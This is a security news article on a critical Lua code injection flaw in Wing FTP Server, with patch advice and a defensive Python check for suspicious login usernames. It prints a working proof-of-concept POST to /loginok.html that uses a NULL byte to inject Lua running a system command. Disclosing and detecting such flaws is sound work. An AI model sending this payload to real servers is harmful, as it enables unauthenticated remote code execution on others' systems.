This flaw, classified under CWE-94: Code Injection, carries a maximum CVSSv4 score of 10.0, indicating its criticality and ease of exploitation.
The vulnerability was discovered by security researcher Julien Ahrens from RCE Security and publicly disclosed on June 30, 2025.
Wing FTP Server is a widely used, cross-platform FTP solution supporting multiple protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP.
Its web-based administration and flexible connectivity make it popular among enterprises and small businesses alike.
The vulnerability resides in the server’s handling of the /loginok.html endpoint.
Specifically, the server fails to properly sanitize the “username” parameter when it contains NULL bytes.
This oversight enables attackers to inject arbitrary Lua code into user session files.
If exploited, this allows an attacker to execute any command on the underlying system with the same privileges as the Wing FTP Server process—typically root on Linux or NT AUTHORITY\SYSTEM on Windows.
A proof-of-concept exploit demonstrates how an attacker can craft a malicious POST request to the vulnerable endpoint:
```text
POST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 121

username=anonymous%00]]%0dlocal+h+%3d+io.popen("id")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=correct
```
This payload injects Lua code that executes the id command, demonstrating arbitrary command execution.
The risk is heightened if the server allows anonymous access, as it enables fully unauthenticated remote code execution.
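A defender-side check for the request pattern described above, added here as an example and not code from RCE Security, Wing FTP, or the original post: it decodes the form body of a login POST the way a reverse proxy or WAF would, keeping raw bytes so the NULL byte survives, and flags the three markers the published payload depends on (a NULL byte, the Lua long-bracket terminator `]]`, and a line break inside the username field). The sample bodies and field names are assumptions constructed for the example.

```python
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Constructed sample POST bodies for /loginok.html, as a reverse proxy or WAF
# would see them before the server parses them. These are made-up test inputs
# for the example, not traffic taken from the advisory.
SAMPLE_BODIES = {
    "benign": b"username=alice&password=s3cret",
    "null_byte": b"username=anonymous%00]]%0dprint(1)%0d--&password=x",
    "long_bracket_only": b"username=bob]]&password=x",
}


def parse_form_body(body: bytes) -> Dict[str, bytes]:
    """Decode an application/x-www-form-urlencoded body into raw bytes per field.

    Values are kept as bytes (not str) so that an embedded NULL byte is visible
    to the check below instead of being dropped or raising during decoding.
    """
    fields: Dict[str, bytes] = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        # '+' means space in form encoding; percent-decoding yields raw bytes
        fields[name.decode("ascii", "replace")] = unquote_to_bytes(value.replace(b"+", b" "))
    return fields


def inspect_login_body(body: bytes) -> List[str]:
    """Return findings for a login form body; an empty list means nothing suspicious."""
    findings: List[str] = []
    username = parse_form_body(body).get("username", b"")
    if b"\x00" in username:
        findings.append("null byte in username")
    if b"]]" in username:
        findings.append("lua long-bracket terminator ']]' in username")
    # A CR or LF inside a single form field is never a legitimate username
    if b"\r" in username or b"\n" in username:
        findings.append("line break in username")
    return findings


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, "->", inspect_login_body(body) or "clean")
```

The NULL-byte check is the one that matters for this flaw; the other two only raise confidence and would be noisy on their own. A rule like this belongs in front of the server as a stopgap until the upgrade to 7.4.4 is rolled out, and a hit on a request to /loginok.html is worth checking the server's session directory for unexpected Lua in session files.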
Upon notification, the vendor promptly released Wing FTP Server version 7.4.4, which addresses this vulnerability.
All users are strongly urged to update immediately to mitigate the risk of exploitation.
RCE Security emphasizes the importance of continuous vulnerability management and rapid response.
Their approach involves continuous penetration testing, external attack surface management, and detailed, actionable reporting to ensure vulnerabilities like CVE-2025-47812 are identified and remediated before malicious actors can exploit them.
This incident underscores the critical need for robust input validation and regular software updates in all internet-facing services.
Organizations running Wing FTP Server should prioritize patching and review their server configurations, especially regarding anonymous access permissions, to minimize exposure.
The post Critical Vulnerability in Wing FTP Server Allows Attackers to Seize Full Control appeared first on Cyber Security News.